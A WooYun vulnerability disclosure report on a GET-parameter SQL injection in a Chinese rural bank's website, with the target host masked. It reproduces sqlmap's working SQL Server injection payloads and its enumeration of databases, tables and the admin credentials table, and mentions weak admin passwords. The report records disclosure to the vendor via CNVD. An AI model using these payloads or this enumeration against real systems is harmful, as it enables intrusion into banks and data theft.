乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
吃完饭,没事干,挖挖洞...
内蒙古呼伦贝尔农商银行主站存在GET型SQL注入一枚,导致大量数据库信息泄露。
内蒙古呼伦贝尔农商银行主站存在注入一枚,可泄露23库,几百表。SQL注入地址:http://**.**.**.**/TextNewsList.aspx?NTID=11(注入参数NTID)数据库SQL Server 2008
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Place: GETParameter: NTID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: NTID=11 AND 9320=9320 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: NTID=11 AND 5690=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (5690=5690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: NTID=-4137 OR 6051=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: NTID=(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (8187=8187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))---web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008
一共23库
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [23]:[*] a1[*] a2[*] ERP[*] ERPOA[*] examDB[*] ICCO[*] KQ123[*] lctj[*] master[*] model[*] msdb[*] MySchool[*] MZMT[*] NS_Web_DB[*] ReportServer[*] ReportServerTempDB[*] sbgl[*] sbgl1[*] tempdb[*] VCDB[*] XHDCRM[*] ybj0470[*] zptest
当前数据库:NS_Web_DB
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'NS_Web_DB'
该数据库包含21表
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: NS_Web_DB[21 tables]+---------------+| ApplyCompany || ApplyPOS || ApplyPersonal || ApplyWithdraw || Article || ArticleClass || Branch || CenterM_Roles || CenterM_Users || Class || Messageboard || Messages || NewsCategory || PicNews || S_Tree || Survey || SurveyOption || SysLog || TextNews || UserRoles || Users |+---------------+
管理员表: CenterM_Users
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: NS_Web_DBTable: CenterM_Users[6 columns]+----------+---------+| Column | Type |+----------+---------+| Count | int || ID | varchar || Name | varchar || PassWord | varchar || RID | int || Status | int |+----------+---------+
dump下管理表看看,管理员的密码都是弱密码。
a1数据库包含129表
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: a1[129 tables]+-----------------------+| AtdDayResult || AtdFixShiftD || AtdFixShiftM || AtdHoliday || AtdMonthResult || AtdProcRec || AtdRecLeave || AtdRecOver || AtdRecRest || AtdRecShift || AtdRecord || AtdResultSect || AtdResultType || AtdRule || AtdRuleList || AtdShift || AtdShiftGroup || AtdShiftSect || AtdWeekend || CardBalanceInfo || CardGrade || ChgAmountRecord || ChgConsumeSect || ChgRecord || ConsumeLog || CopyChgRecord || CopyMngAccount || CopyMngCardAdjust || CopyMngCardChange || CopyMngChgType || CopyMngEquPos || CopyMngMoneyChange || CopyMngRepair || CopyParam || CpyCopierList || CpyMngChgType || CustomProperty || DeviceParameter || DrRecord || DrTime || DrTimeList || EmplCustomProp || EquBell || EquBellList || EquCard || EquFinger || EquList || EquMsg || EquMsgText || EquReg || ErrorChgRecord || FPDrTime || FPTimeArea || FPTimeSect || FPTimeTeam || FixConsume || FixConsumeSet || FunParam || HrDept || HrEmployee || HrLeaveEmpl || HrTeam || JSDrTime || JSHolidayDate || JiTimeConsume || LogSize || MngAccount || MngBlackList || MngCardAdjust || MngCardChange || MngCardType || MngChgType || MngEquPos || MngMoneyChange || MngOrgan || MngRecAllowance || MngRepair || MngSquare || PropGroup || RegCardInfo || ShiftCurDay || ShiftNxtDay || ShiftPreDay || SysAllModule || SysBinInfo || SysDefDbGb || SysDicSubType || SysDicType || SysFavorite || SysFormsLang || SysGrid || SysGroupMember || SysGroupRight || SysGuide || SysInfo || SysIniIDCardNo || SysLog || SysMenuGroup || SysOper || SysOperGroup || SysPackage || SysQryConditionD || SysQryConditionM || SysRep || SysTmpNum || SysTxtSet || SysUseModule || TemplateD || TemplateM || Tmp150729150105500005 || Tmp150729152527373009 || TmpConsume || TmpOnDuty || TmpRealTime || TmpRecord || WageBankPaper || WageCalcMode || WageCalcResult || WageEmpItemChange || WageFixItemChange || WageFunction || WageItem || WagePersonTax || WagePersonnel || WageWorkProc || WageWorkProcMode || WorkProcAdjust || WorkProcRec || consumedetailview |+-----------------------+
ERPOA包含100表:
web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: ERPOA[100 tables]+--------------------+| ERPAnPai || ERPBBSBanKuai || ERPBBSTieZi || ERPBaoJia || ERPBaoXiao || ERPBook || ERPBookJieHuan || ERPBuMen || ERPBuyChanPin || ERPBuyOrder || ERPCYDIC || ERPCarInfo || ERPCarShiYong || ERPCarWeiHu || ERPContract || ERPContractChanPin || ERPCrmSetting || ERPCustomFuWu || ERPCustomHuiFang || ERPCustomInfo || ERPCustomNeed || ERPDanWeiInfo || ERPDangAn || ERPDengJi || ERPFeiYong || ERPFileList || ERPFlowType || ERPForm || ERPFormType || ERPGongGao || ERPGuDing || ERPGuDingJiLu || ERPHuiBao || ERPJSDIC || ERPJiangCheng || ERPJiaoSe || ERPJinDu || ERPJuanKu || ERPKaoHe || ERPKaoHeRW || ERPKaoHeXM || ERPKaoQin || ERPKaoQinSetting || ERPKuaiDi || ERPLanEmail || ERPLiRun || ERPLinkLog || ERPLinkMan || ERPMeeting || ERPMenu || ERPMoBan || ERPMobile || ERPNetEmail || ERPOfficething || ERPPeiXun || ERPPeiXunRiJi || ERPPeiXunXiaoGuo || ERPPinShen || ERPProduct || ERPProductType || ERPProject || ERPRedHead || ERPRenShiHeTong || ERPRiChangBaoXiao || ERPRiZhi || ERPSaveFileName || ERPSerils || ERPShenPi || ERPShiShi || ERPShouKuan || ERPSongHuoDan || ERPSongYang || ERPSource || ERPSupplyLink || ERPSupplys || ERPSystemSetting || ERPTalkInfo || ERPTalkOnlineUser || ERPTalkSetting || ERPTelFile || ERPTongXunLu || ERPTouSu || ERPUser || ERPUserDesk || ERPVote || ERPWorkFlow || ERPWorkFlowJieDian || ERPWorkPlan || ERPWorkRiZhi || ERPWorkToDo || ERPWuLiuQingKuang || ERPYinZhang || ERPYinZhangLog || ERPZhiShiType || ERPZhiSiKu || S_GroupMenu || S_Role || S_RoleMenu || S_Times || dtproperties |+--------------------+
想看那个看哪个!
银行系统需要更加重视安全啊。
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 08:26
CNVD确认所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置.
暂无